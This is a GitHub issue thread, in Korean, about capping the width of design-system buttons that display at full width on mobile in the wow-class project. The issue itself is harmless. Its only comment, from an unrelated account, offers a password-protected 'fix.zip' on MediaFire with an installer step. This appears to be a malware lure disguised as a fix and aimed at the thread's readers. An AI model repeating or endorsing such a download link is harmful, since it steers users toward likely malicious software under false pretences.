### ISSUE TITLE
[Design] 버튼 maxWidth 지정

### ISSUE THREAD

**Issue by ghdtjgus76** [GDSC-Hongik/wow-class#68]
## 🎯 설명
와우 클래스에서 와우 디자인 시스템 버튼을 사용하는데, 와우 디자인 시스템 버튼에 반응형 작업이 되어 있어 모바일 기기에서는 width 100%로 보입니다.
버튼이 너무 크게 보이는 문제가 있어 maxWidth를 조정합니다.

## ✅ TODO

- [x] 버튼 maxWidth 지정

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
